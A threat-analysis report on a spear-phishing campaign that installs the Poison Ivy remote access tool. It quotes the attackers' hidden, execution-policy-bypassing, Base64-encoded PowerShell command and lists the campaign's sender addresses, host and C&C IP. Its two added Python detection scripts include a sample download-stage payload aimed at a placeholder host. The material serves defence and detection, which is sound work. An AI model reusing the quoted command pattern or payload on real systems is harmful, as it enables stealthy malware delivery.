FreeHosting APT PowerSploit Poison Ivy Continues to Spread

FreeHosting APT PowerSploit Poison Ivy is a mouthful indeed. The “APT” part in the name stands for Advanced Persistent Threat. The “PowerSploit” part points to the Microsoft PowerShell scripts used in the attack. Finally, “Poison Ivy” is a thoroughly researched, well-documented remote access tool (RAT) that has been around for a decade now. Together, these names describe a spear-phishing campaign that has successfully delivered phishing emails carrying malicious attachments and links, which in turn serve to deploy Poison Ivy. In this report, we discuss the nitty-gritty of this dangerous malware, and, hopefully, the information we provide will help you protect yourself against it. If you are interested in this, continue reading.

The success of FreeHosting APT PowerSploit Poison Ivy attacks depends on a stealthy scam that pushes gullible users into opening a fake Microsoft Word document. First, the attackers obtain a list of real email addresses. These could be accumulated during a phishing scam run by the actors themselves; for example, they could use an adware server to push misleading surveys or prize giveaways that collect this data. They could also buy addresses from third parties. If you do not want your email address to be recorded by a malicious party, be very cautious about how and where you disclose it. Keep in mind that less reliable services can sell it or share it without your knowledge. Once cyber criminals have the list of legitimate email addresses, they can start the FreeHosting APT PowerSploit Poison Ivy attack.

The message created by the FreeHosting APT PowerSploit Poison Ivy creators is meant to be highly attractive, so both the subject line and the body are designed to trick you. So far, two unique email addresses (wisers.data@gmail.com and health.pro.demo30@gmail.com) have been found sending these phishing emails. The message is meant to trick you into clicking a download link that points to an encoded VBScript. According to our research, the malware is stored on geocities.jp, which provides free hosting services. If the link is clicked, the VBScript executes the command powershell.exe -w hidden -ep bypass -Enc "<encoded message>", where -w hidden hides the PowerShell window, -ep bypass disables the execution policy, and -Enc passes the script as a Base64-encoded command. The script downloads and executes a file named “Meeting_summary.doc.” Based on the name, it is most likely that FreeHosting APT PowerSploit Poison Ivy phishing emails are targeted at businesses, companies, governments, and organizations whose employees use email as their primary means of communication.
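The command line quoted above (hidden window, execution policy bypass, Base64-encoded command) is a pattern that process-creation logging can catch before the second stage runs. The following triage script is an added example written for this report, not code from the original campaign write-up or from any vendor: it parses powershell.exe switches (including the documented short forms -w, -ep, -e/-ec and unambiguous prefixes such as -Enc), decodes the UTF-16LE payload behind -EncodedCommand, and scores each event. The sample events, the decoded payload, the parent-process list and the scoring weights are all constructed for illustration and should be tuned to your environment.

```python
import base64
import binascii

# Short forms documented by "powershell.exe /?"; PowerShell also accepts any
# unambiguous prefix of a switch name, which the prefix check below covers.
SWITCHES = {
    "windowstyle": {"w"},
    "executionpolicy": {"ep", "ex"},
    "encodedcommand": {"e", "ec"},
}
# Parents that should rarely spawn PowerShell on a workstation (assumption:
# adjust this list to what is normal in your environment).
SCRIPT_PARENTS = {"wscript.exe", "cscript.exe", "winword.exe", "excel.exe", "outlook.exe"}
# Strings in a decoded payload that indicate a download-and-run stage.
PAYLOAD_INDICATORS = ("downloadfile", "downloadstring", "invoke-expression", "iex", "frombase64string")


def canonical_switch(token):
    """Map a powershell.exe switch token such as '-ep' or '/Enc' to its full name."""
    if not token or token[0] not in "-/":
        return None
    key = token.lstrip("-/").lower()
    if not key:
        return None
    for name, shorts in SWITCHES.items():
        if key in shorts or (len(key) >= 2 and name.startswith(key)):
            return name
    return None


def decode_encoded_command(b64):
    """-EncodedCommand carries Base64 of UTF-16LE text; return None if it is malformed."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def triage_event(event):
    """Score one process-creation event; a higher score means more suspicious."""
    tokens = event["cmdline"].split()  # assumption: switch values contain no spaces
    result = {"score": 0, "reasons": [], "decoded": None}
    if not tokens or not tokens[0].lower().endswith("powershell.exe"):
        return result
    for i, tok in enumerate(tokens[1:], start=1):
        name = canonical_switch(tok)
        value = tokens[i + 1] if i + 1 < len(tokens) else ""
        if name == "windowstyle" and value.lower() == "hidden":
            result["score"] += 1
            result["reasons"].append("hidden window")
        elif name == "executionpolicy" and value.lower() == "bypass":
            result["score"] += 1
            result["reasons"].append("execution policy bypass")
        elif name == "encodedcommand" and value:
            result["score"] += 1
            result["reasons"].append("encoded command")
            decoded = decode_encoded_command(value)
            result["decoded"] = decoded
            if decoded and any(ind in decoded.lower() for ind in PAYLOAD_INDICATORS):
                result["score"] += 2
                result["reasons"].append("download/eval cmdlet in decoded payload")
    parent = event.get("parent", "").lower()
    if parent in SCRIPT_PARENTS:
        result["score"] += 2
        result["reasons"].append(f"spawned by {parent}")
    return result


def triage(events):
    """Score every event and return the results, most suspicious first."""
    return sorted((triage_event(ev) for ev in events), key=lambda r: r["score"], reverse=True)


# Constructed sample payload and events (not taken from the original report).
SAMPLE_PAYLOAD = "(New-Object Net.WebClient).DownloadFile('http://example.invalid/Meeting_summary.doc', 'm.doc')"
SAMPLE_ENC = base64.b64encode(SAMPLE_PAYLOAD.encode("utf-16-le")).decode("ascii")
SAMPLE_EVENTS = [
    {"parent": "wscript.exe", "cmdline": f"powershell.exe -w hidden -ep bypass -Enc {SAMPLE_ENC}"},
    {"parent": "explorer.exe", "cmdline": r"powershell.exe -NoProfile -File C:\Scripts\inventory.ps1"},
    {"parent": "svchost.exe", "cmdline": "powershell.exe -ExecutionPolicy Bypass -NonInteractive -Command Get-Date"},
]

if __name__ == "__main__":
    for r in triage(SAMPLE_EVENTS):
        print(r["score"], r["reasons"], (r["decoded"] or "")[:60])
```

The first sample event scores 7 (hidden window, bypass, encoded command, a download cmdlet in the decoded text, and a script-host parent), the administrative inventory script scores 0, and the bare -ExecutionPolicy Bypass call scores 1, so a threshold of 3 or more separates the campaign's pattern from routine use. The decoder is also useful on its own for reading what an encoded command actually does before deciding on containment.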

The “Meeting_summary.doc” file opens a document that downloads a PowerShell script, which is encoded just like the VBScript. A process named “userinit.exe” is created, and shellcode carrying the malicious Poison Ivy payload is injected into it. Userinit.exe is also responsible for connecting to a C&C server (IP address 61.97.243.15) and sending information such as the operating system version, the processor architecture and count, and the system environment variables. As you can see, FreeHosting APT PowerSploit Poison Ivy relies on malicious code and scripts, and it is essentially a fileless infection; because of this, there is no file to remove as such. If the code is executed, it allows remote attackers to access and, possibly, control the infected system. The distribution and execution of Poison Ivy are incredibly stealthy processes, and, unfortunately, the victims might not recognize the attack even when it is in full swing.
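Because the infection is fileless, the useful detection signals are behavioural: a userinit.exe that was not started by winlogon.exe (or that runs from somewhere other than System32), and a userinit.exe that opens a network connection to an external host, in particular the C&C address given above. The hunting script below is an added example written for this report, not code from the original write-up; it walks Sysmon-style process-creation and network-connection events and reports those anomalies per process ID. The expected image path and parent process are assumptions about a stock Windows installation, and the sample events are constructed for illustration.

```python
import ipaddress

# Indicator from the report: the C&C address contacted by the injected userinit.exe.
KNOWN_C2 = {"61.97.243.15"}
# Assumption: on a stock Windows install userinit.exe lives in System32 and is
# started by winlogon.exe during logon; anything else deserves a look.
EXPECTED_IMAGE = r"c:\windows\system32\userinit.exe"
EXPECTED_PARENT = "winlogon.exe"


def image_name(path):
    """Return the file name part of a Windows image path, lower-cased."""
    return path.rsplit("\\", 1)[-1].lower()


def is_external(ip):
    """True for a routable address outside private/loopback/link-local ranges."""
    addr = ipaddress.ip_address(ip)
    return not (addr.is_private or addr.is_loopback or addr.is_link_local)


def hunt_userinit(events):
    """Return (pid, reason) findings for userinit.exe processes that behave abnormally."""
    findings = []
    for ev in events:
        if image_name(ev["image"]) != "userinit.exe":
            continue
        if ev["type"] == "process_create":
            if ev["image"].lower() != EXPECTED_IMAGE:
                findings.append((ev["pid"], f"userinit.exe running from {ev['image']}"))
            if ev["parent"].lower() != EXPECTED_PARENT:
                findings.append((ev["pid"], f"userinit.exe spawned by {ev['parent']}"))
        elif ev["type"] == "network_connect":
            if ev["dest_ip"] in KNOWN_C2:
                findings.append((ev["pid"], f"connection to known C&C {ev['dest_ip']}:{ev['dest_port']}"))
            elif is_external(ev["dest_ip"]):
                findings.append((ev["pid"], f"userinit.exe contacting external host {ev['dest_ip']}"))
    return findings


def summarize(findings):
    """Group findings by PID so one injected process shows up as a single case."""
    by_pid = {}
    for pid, reason in findings:
        by_pid.setdefault(pid, []).append(reason)
    return by_pid


# Constructed sample events in a Sysmon-like shape (not from the original report).
SAMPLE_EVENTS = [
    {"type": "process_create", "pid": 4120, "image": r"C:\Windows\System32\userinit.exe",
     "parent": "winlogon.exe"},
    {"type": "process_create", "pid": 5588, "image": r"C:\Windows\System32\userinit.exe",
     "parent": "powershell.exe"},
    {"type": "network_connect", "pid": 5588, "image": r"C:\Windows\System32\userinit.exe",
     "dest_ip": "61.97.243.15", "dest_port": 443},
    {"type": "network_connect", "pid": 4120, "image": r"C:\Windows\System32\userinit.exe",
     "dest_ip": "10.0.0.5", "dest_port": 445},
    {"type": "process_create", "pid": 6012, "image": r"C:\Windows\System32\svchost.exe",
     "parent": "services.exe"},
]

if __name__ == "__main__":
    for pid, reasons in summarize(hunt_userinit(SAMPLE_EVENTS)).items():
        print(pid, reasons)
```

On the sample data only PID 5588 is reported, with two reasons: it was spawned by powershell.exe and it connected to the C&C address. The legitimate logon instance (PID 4120, parent winlogon.exe, internal share traffic) produces nothing. Matching on a hard-coded C&C address ages quickly, so the parent-process and external-connection checks are the part worth keeping in a permanent hunt.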

While you cannot do much once the FreeHosting APT PowerSploit Poison Ivy attack has been executed, there are ways to protect yourself against it. Most importantly, do not open spam emails or the links and attachments sent via them. What if the subject line is misleading? You have to be vigilant, and even if it says something like “meeting information,” you can suspect a scam if the sender is unfamiliar to you. If you ever have doubts, consult the security expert in your office. If you have no one to consult, always remember that it is best to ignore unfamiliar senders and random emails with information that does not make sense. If you did not plan any meetings, why would you open an email that allegedly provides you with more information about them? Caution is important, but, in some cases, it is not enough. Do not forget to implement reliable anti-malware software that can detect and warn you about suspicious activity.